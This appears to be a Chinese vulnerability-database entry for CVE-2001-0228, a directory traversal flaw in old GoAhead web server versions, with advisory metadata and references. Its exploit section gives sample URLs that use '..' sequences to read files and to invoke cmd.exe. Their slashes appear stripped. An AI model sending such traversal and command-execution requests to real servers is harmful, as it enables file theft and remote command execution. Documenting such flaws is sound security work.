GoAhead web server目录遍历漏洞

24次阅读
没有评论

GoAhead web server目录遍历漏洞

漏洞ID 1106200 漏洞类型 路径遍历
发布时间 2001-02-02 更新时间 2001-05-03
GoAhead web server目录遍历漏洞CVE编号 CVE-2001-0228
GoAhead web server目录遍历漏洞CNNVD-ID CNNVD-200105-040
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/20607
https://www.securityfocus.com/bid/88638
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200105-040
|漏洞详情
GoAheadwebserver2.1和之前版本存在目录遍历漏洞。远程攻击者借助HTTPGET请求中..攻击读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/2334/info

A specially crafted URL composed of '..' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. 

Gaining access to a known file:

http://target/............filename

Executing arbitrary commands:

http://target/cgi-bin/............winntsystem32cmd.exe?/c+dir+c:
|受影响的产品
GoAhead Software GoAhead Webserver (Windows) V.2.0

GoAhead Software GoAhead WebServer v.2.1

|参考资料

来源:BUGTRAQ
名称:20010202GoAheadWebServerDirectoryTraversalVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2001-02/0022.html

相关推荐: FreeBSD TCP RST拒绝服务漏洞

FreeBSD TCP RST拒绝服务漏洞 漏洞ID 1207274 漏洞类型 未知 发布时间 1998-10-13 更新时间 1998-10-13 CVE编号 CVE-1999-0053 CNNVD-ID CNNVD-199810-013 漏洞平台 N/A …

正文完
 0